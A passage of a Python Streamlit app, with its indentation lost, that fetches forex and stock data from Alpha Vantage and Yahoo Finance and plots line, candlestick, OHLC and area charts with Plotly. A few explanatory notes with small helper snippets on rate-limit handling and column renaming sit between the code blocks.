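    "1. open": "Open",
    "2. high": "High",
    "3. low": "Low",
    "4. close": "Rate",
}

def normalize_time_series(payload):
    # payload: the "Time Series ..." dict from the JSON response.
    # Returns a frame with an 'index' date column plus Open/High/Low/Rate.
    frame = pd.DataFrame(payload).T.reset_index()
    return frame.rename(columns=OHLC_RENAMES)
```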
if radio_select == 'Forex' :
st.title("FOREX")
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
col1, col2 = st.columns(2)
with col1 :
digital_data = pd.read_csv("physical_currency_list1.csv")
dictio = digital_data.set_index('currency name').T.to_dict('list')
digital_list = digital_data['currency name'].dropna().unique().tolist()
crypto_select1 = st.selectbox("Select the Currency", digital_list)
input_value = dictio[crypto_select1][0]
with col2 :
currency_data = pd.read_csv("physical_currency_list.csv")
dictio2 = currency_data.set_index('currency name').T.to_dict('list')
currency_list = currency_data['currency name'].dropna().unique().tolist()
currency_select = st.selectbox("Select currency pair", currency_list)
currency_select = dictio2[currency_select][0]
with st.expander('Show Options') :
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min", "30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly", "1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=FX_" + interval_list2_dict[
interval_select] + "&from_symbol=" + str(
input_value) + "&to_symbol=" + str(
currency_select) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
data = data.json()
data = json.dumps(data["Time Series FX (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5, step=1)
for i in range(len(interval_sel)) :
data2 = rs.get("https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + str(currency_select) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select + "</sub></h1>",
unsafe_allow_html=True)
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# price trace: candlestick or OHLC bars, depending on the selected graph type
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
# include a go.Bar trace for volumes
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
        "The selected forex pair data is currently unavailable. Please check your connection or choose another pair.")
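When Alpha Vantage rate-limits a key it returns a `Note` (or `Error Message`) field instead of the series, which the bare `except Exception` above folds into the generic connection message. A hypothetical guard, sketched here with a plain `ValueError` (the file's own `MyError` would work the same way), could surface the API's explanation instead:

```python
def extract_series(response_json, series_key):
    # Return the requested time-series block, or raise with the API's own
    # message when the payload carries a rate-limit note or an error instead.
    if series_key in response_json:
        return response_json[series_key]
    detail = (response_json.get("Note")
              or response_json.get("Error Message")
              or "no data returned")
    raise ValueError(detail)
```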
if radio_select == "Global stocks and more(Alpha Vantage)" :
st.title(radio_select)
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
    keyword = st.text_input("Search by symbol, name, or keyword")
if keyword != '' :
data = rs.get('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = data.json()
try :
if data["bestMatches"] == [] :
raise (MyError('No financial entity with this name found in our system'))
data = json.dumps(data["bestMatches"])
data = pd.read_json(data)
data.rename(columns={'1. symbol' : 'Symbol'}, inplace=True)
data.rename(columns={'2. name' : 'Name'}, inplace=True)
data.rename(columns={'3. type' : 'Type'}, inplace=True)
data.rename(columns={'4. region' : 'Region'}, inplace=True)
data.rename(columns={'5. marketOpen' : 'Market Open'}, inplace=True)
data.rename(columns={'6. marketClose' : 'Market Close'}, inplace=True)
data.rename(columns={'7. timezone' : 'Timezone'}, inplace=True)
data.rename(columns={'8. currency' : 'Currency'}, inplace=True)
data_ticker = data['Symbol'].tolist()
data_name = data['Name'].tolist()
data_type = data['Type'].tolist()
data_region = data['Region'].tolist()
new_list = []
for i in range(len(data_ticker)) :
s = data_name[i] + "----" + data_ticker[i] + "----" + data_type[i] + "----" + data_region[i]
new_list.append(s)
new_list.insert(0, '--Select from options--')
col1, col2 = st.columns(2)
with col1 :
new_box = st.selectbox("Select from below options", new_list)
if (new_box != '--Select from options--') :
input_value = new_box.split("----")[1]
crypto_select1 = new_box.split("----")[0]
currency_select = data[data['Symbol'] == input_value]['Currency'].tolist()
currency_select1 = currency_select[0]
currency_data = pd.read_csv("physical_currency_list.csv")
currency_select = currency_data[currency_data['currency code'] == currency_select[0]]['currency name']
with col2 :
st.selectbox("Select Currency pair", currency_select, disabled=True)
st.table(data[data['Symbol'] == input_value].drop(['9. matchScore'], axis=1))
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly",
"1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=TIME_SERIES_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
data = data.json()
data = json.dumps(data["Time Series (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5,
step=1)
for i in range(len(interval_sel)) :
data2 = rs.get(
"https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select1 + "</sub></h1>",
unsafe_allow_html=True)
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# price trace: candlestick or OHLC bars, depending on the selected graph type
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
            "The selected financial entity's data is currently unavailable. Please check your connection or choose another name.")
except MyError as err :
st.info(err.value)
if radio_select == "US Stocks" :
st.title(radio_select)
    keyword = st.text_input("Search by symbol, name, or keyword")
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
if keyword != '' :
data = rs.get('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = data.json()
try :
if data["bestMatches"] == [] :
raise (MyError('No financial entity with this name found in our system'))
data = json.dumps(data["bestMatches"])
data = pd.read_json(data)
data.rename(columns={'1. symbol' : 'Symbol'}, inplace=True)
data.rename(columns={'2. name' : 'Name'}, inplace=True)
data.rename(columns={'3. type' : 'Type'}, inplace=True)
data.rename(columns={'4. region' : 'Region'}, inplace=True)
data.rename(columns={'5. marketOpen' : 'Market Open'}, inplace=True)
data.rename(columns={'6. marketClose' : 'Market Close'}, inplace=True)
data.rename(columns={'7. timezone' : 'Timezone'}, inplace=True)
data.rename(columns={'8. currency' : 'Currency'}, inplace=True)
data = data[data['Region'] == 'United States']
if data.count(axis=0)['Symbol'] == 0 :
raise (MyError('No US Stocks with this name found in our system'))
data_ticker = data['Symbol'].tolist()
data_name = data['Name'].tolist()
data_type = data['Type'].tolist()
data_region = data['Region'].tolist()
new_list = []
for i in range(len(data_ticker)) :
s = data_name[i] + "----" + data_ticker[i] + "----" + data_type[i]
new_list.append(s)
new_list.insert(0, '--Select from options--')
col1, col2 = st.columns(2)
with col1 :
new_box = st.selectbox("Select from below options", new_list)
if (new_box != '--Select from options--') :
input_value = new_box.split("----")[1]
crypto_select1 = new_box.split("----")[0]
currency_select = data[data['Symbol'] == input_value]['Currency'].tolist()
currency_select1 = currency_select[0]
currency_data = pd.read_csv("physical_currency_list.csv")
currency_select = currency_data[currency_data['currency code'] == currency_select[0]]['currency name']
with col2 :
st.selectbox("Select Currency pair", currency_select, disabled=True)
st.table(data[data['Symbol'] == input_value].drop(['9. matchScore'], axis=1))
over_data = rs.get('https://www.alphavantage.co/query?function=OVERVIEW&symbol=' + str(
input_value) + '&apikey=' + random.choice(api_list))
if over_data.json() != {} :
milind = st.button('Get more info')
if milind :
a = over_data.json()
c = pd.DataFrame(a, index=[0])
d = c.T.reset_index()
d.index = np.arange(1, len(d) + 1)
d.rename(columns={'index' : 'Info Term'}, inplace=True)
d.rename(columns={0 : 'Info Description'}, inplace=True)
st.table(d)
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly",
"1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=TIME_SERIES_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
data = data.json()
data = json.dumps(data["Time Series (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5,
step=1)
for i in range(len(interval_sel)) :
data2 = rs.get(
"https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + input_value + "/" + currency_select1 + "</sub></h1>",
unsafe_allow_html=True)
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected financial entity data is currently unavailable. Please check your connection or choose another name.")
except MyError as err :
st.info(err.value)
if radio_select == 'Indian Stocks' :
st.title(radio_select)
keyword = st.text_input("Search by symbol, name, or keyword")
size_select = st.sidebar.radio('Select output size', ['compact', 'full(uses more data)'])
size_select = size_select.split('(')[0]
if keyword != '' :
print(keyword)
print('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = rs.get('https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=' + str(
keyword) + '&apikey=' + random.choice(api_list))
data = data.json()
# data = pd.read_json(data)
try :
if data["bestMatches"] == [] :
raise (MyError('No financial entity with this name found in our system'))
data = json.dumps(data["bestMatches"])
data = pd.read_json(data)
data.rename(columns={'1. symbol' : 'Symbol'}, inplace=True)
data.rename(columns={'2. name' : 'Name'}, inplace=True)
data.rename(columns={'3. type' : 'Type'}, inplace=True)
data.rename(columns={'4. region' : 'Region'}, inplace=True)
data.rename(columns={'5. marketOpen' : 'Market Open'}, inplace=True)
data.rename(columns={'6. marketClose' : 'Market Close'}, inplace=True)
data.rename(columns={'7. timezone' : 'Timezone'}, inplace=True)
data.rename(columns={'8. currency' : 'Currency'}, inplace=True)
data = data[data['Region'] == 'India/Bombay']
if data.count(axis=0)['Symbol'] == 0 :
raise (MyError('No Indian Stocks with this name found in our system'))
data_ticker = data['Symbol'].tolist()
data_name = data['Name'].tolist()
data_type = data['Type'].tolist()
data_region = data['Region'].tolist()
new_list = []
for i in range(len(data_ticker)) :
s = data_name[i] + "----" + data_ticker[i].split('.')[0] + "----" + data_type[i]
new_list.append(s)
new_list.insert(0, '--Select from options--')
col1, col2 = st.columns(2)
with col1 :
new_box = st.selectbox("Select from below options", new_list)
if (new_box != '--Select from options--') :
temp_select = new_box.split("----")[1]
input_value = new_box.split("----")[1] + '.BSE'
crypto_select1 = new_box.split("----")[0]
currency_select = data[data['Symbol'] == input_value]['Currency'].tolist()
currency_select1 = currency_select[0]
currency_data = pd.read_csv("physical_currency_list.csv")
currency_select = currency_data[currency_data['currency code'] == currency_select[0]]['currency name']
with col2 :
st.selectbox("Select Currency pair", currency_select, disabled=True)
data = data[data['Symbol'] == input_value].drop(['9. matchScore'], axis=1)
data.loc[:, 'Symbol'] = temp_select  # avoid chained assignment; every remaining row is the selected symbol
st.table(data)
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week", "1 Month"]
interval_list2_dict = {"1 Day" : "DAILY", "1 Week" : "WEEKLY", "1 Month" : "MONTHLY"}
interval_list21_dict = {"1 Day" : "Daily", "1 Week" : "Weekly", "1 Month" : "Monthly"}
indicator_dict = {"1 Minute" : "1min", "5 Minutes" : "5min", "15 Minutes" : "15min",
"30 Minutes" : "30min",
"60 Minutes" : "60min", "1 Day" : "daily", "1 Week" : "weekly",
"1 Month" : "monthly"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
flag = 0
try :
y_arr = ['Rate']
data = None
if flag == 0 :
data = rs.get("https://www.alphavantage.co/query?function=TIME_SERIES_" + interval_list2_dict[
interval_select] + "&symbol=" + str(
input_value) + "&outputsize=" + size_select + "&apikey=" + random.choice(api_list))
# data=rs.get('https://www.alphavantage.co/query?function=DAILY&symbol=RELIANCE.BSE&outputsize=full&apikey=demo')
data = data.json()
data = json.dumps(data["Time Series (" + str(interval_list21_dict[interval_select]) + ")"])
data = pd.read_json(data)
data = data.T.reset_index()
data.rename(columns={'4. close' : 'Rate'}, inplace=True)
data.rename(columns={'1. open' : 'Open'}, inplace=True)
data.rename(columns={'2. high' : 'High'}, inplace=True)
data.rename(columns={'3. low' : 'Low'}, inplace=True)
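The four chained `rename` calls above can be collapsed into a single mapping. A small sketch with dummy data (column labels taken from the Alpha Vantage payload):

```python
import pandas as pd

# Dummy frame with the raw Alpha Vantage column labels
df = pd.DataFrame({"1. open": [1.0], "2. high": [2.0],
                   "3. low": [0.5], "4. close": [1.5]})
# One rename call replaces the four chained inplace renames
df = df.rename(columns={"1. open": "Open", "2. high": "High",
                        "3. low": "Low", "4. close": "Rate"})
```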
if graph_type != 'Filled Area' :
with col5 :
indicate_select = st.multiselect('Add Indicators', indicator_symbol_list)
interval_sel = indicate_select
with col6 :
time_select = st.number_input('Select indicator time period', max_value=30, min_value=5,
step=1)
for i in range(len(interval_sel)) :
data2 = rs.get(
"https://www.alphavantage.co/query?function=" + interval_sel[i] + "&symbol=" + str(
input_value) + "&interval=" + indicator_dict[
interval_select] + "&time_period=" + str(
time_select) + "&series_type=open&outputsize=" + size_select + "&apikey=" + random.choice(
api_list))
data2 = data2.json()
data2 = json.dumps(data2["Technical Analysis: " + interval_sel[i]])
data2 = pd.read_json(data2)
data2 = data2.T.reset_index()
data = pd.merge(data, data2, on="index", how="left")
y_arr = y_arr + interval_sel
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + crypto_select1 + " <sub style='font-size: 25px;'>" + temp_select + "/" + currency_select1 + "</sub></h1>",
unsafe_allow_html=True)
# fig = px.line(data, x="index", y=y_arr, template="ggplot2", labels={"index" : "Date"})
if graph_type == 'Line' :
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['index'], y=data['Rate'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Candlesticks' or graph_type == 'OHLC' :
data.rename(columns={'Rate' : 'Close'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type == 'Candlesticks' :
fig.add_trace(go.Candlestick(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type == 'OHLC' :
fig.add_trace(go.Ohlc(x=data['index'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
for i in range(len(interval_sel)) :
fig.add_trace(
go.Scatter(x=data['index'], y=data[interval_sel[i]], name=interval_sel[i]),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['index'], y=data['5. volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
fig = px.area(data, x='index', y='Rate', template="ggplot2", labels={"index" : "Date"})
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators",
font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
except Exception as e :
st.info(
"The selected financial entity data is currently unavailable. Please check your connection or choose another name.")
except MyError as err :
st.info(err.value)
else:
st.info('Only the Bombay Stock Exchange (BSE/BS) is supported here; for the National Stock Exchange (NSE/NS), select the "Global stocks and more(Yahoo Finance)" option from the sidebar')
if radio_select == "Global stocks and more(Yahoo Finance)" :
st.title(radio_select)
keyword = st.text_input("Search by Symbol/Ticker")
sym_but = st.button('Click here to search for supported symbols')
if sym_but :
webbrowser.open('https://finance.yahoo.com/screener/new')
if keyword != '' :
ticker = yf.Ticker(keyword)
try :
if ticker.info['sector'] :
function_list = ['Information', 'Chart', 'Dividend and Stock Splits', 'Financials', 'Major Holders',
'Institutional Holders', 'Balance sheet', 'Recommendations', 'Cashflow', 'Earnings']
function_select = st.selectbox('Select the function', function_list)
st.write(" ")
if function_select == 'Chart' :
with st.expander('Show Options'):
col3, col4 = st.columns(2)
col5, col6 = st.columns(2)
with col3 :
interval_list = ["1 Day", "1 Week",
"1 Month"]
interval_list2_dict = {"1 Day" : "1d", "1 Week" : "1wk", "1 Month" : "1mo"}
interval_select = st.selectbox("Select Interval", interval_list)
with col4 :
graph_type = st.selectbox('Select Graph type', graph_type_list)
with col5 :
start_date = st.date_input("Start date", datetime.date(2021, 1, 10))
with col6 :
end_date = st.date_input("End date", datetime.date(2022, 2, 10))
st.markdown(
"<h1 style='text-align: center; color: red;'>Chart of " + str(
ticker.info['longName']) + " <sub style='font-size: 25px;'>" +
str(ticker.info['symbol']) + "/" + str(ticker.info['financialCurrency']) + "</sub></h1>",
unsafe_allow_html=True)
data = yf.download(keyword, start=start_date, end=end_date,
interval=interval_list2_dict[interval_select])
data = data.reset_index()
if graph_type == 'Candlesticks' or graph_type == 'OHLC':
fig = make_subplots(specs=[[{"secondary_y" : True}]])
# include candlestick with rangeselector
if graph_type=='Candlesticks':
fig.add_trace(go.Candlestick(x=data['Date'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
if graph_type=='OHLC':
fig.add_trace(go.Ohlc(x=data['Date'],
open=data['Open'], high=data['High'],
low=data['Low'], close=data['Close'], name='Rate'),
secondary_y=True)
# include a go.Bar trace for volumes
fig.add_trace(go.Bar(x=data['Date'], y=data['Volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if graph_type == 'Filled Area' :
data.rename(columns={'Close' : 'Rate'}, inplace=True)
fig = px.area(data, x='Date', y='Rate', template="ggplot2", )
fig.update_layout(autosize=False, width=1600, height=500, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
st.plotly_chart(fig)
if graph_type == 'Line' :
data.rename(columns={'Close' : 'Rate'}, inplace=True)
fig = make_subplots(specs=[[{"secondary_y" : True}]])
fig.add_trace(go.Scatter(x=data['Date'], y=data['Rate'], name='Rate'),
secondary_y=True)
fig.add_trace(go.Bar(x=data['Date'], y=data['Volume'], name='Volume', opacity=0.5),
secondary_y=False)
fig.update_layout(autosize=False, width=1600, height=800, legend_title="Indicators", font=dict(
family="Courier New, monospace",
size=18,
color="RebeccaPurple"
))
fig.layout.yaxis2.showgrid = False
st.plotly_chart(fig)
if function_select == 'Information' :
info = ticker.info
if info['logo_url'] != '' :
string_logo = '<img src=%s>' % info['logo_url']
st.markdown(string_logo, unsafe_allow_html=True)
string_name = info['longName']
st.title('**%s**' % string_name)
try :
st.info(info["longBusinessSummary"])
except :
pass
st.title('Basic Details ')
try :
st.markdown('<div style="color:green"><b >ZIP : </b>' + info['zip'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown(
'<div style="color:green"><b >Full Time Employees : </b>' + str(
info['fullTimeEmployees']) + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Sector : </b>' + info['sector'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Industry : </b>' + info['industry'] + '</div>',
unsafe_allow_html=True)
except :
pass
try :
st.markdown('<div style="color:green"><b >Address : </b>' + info['address1'] + ',' + info[
'address2'] + '</div>',
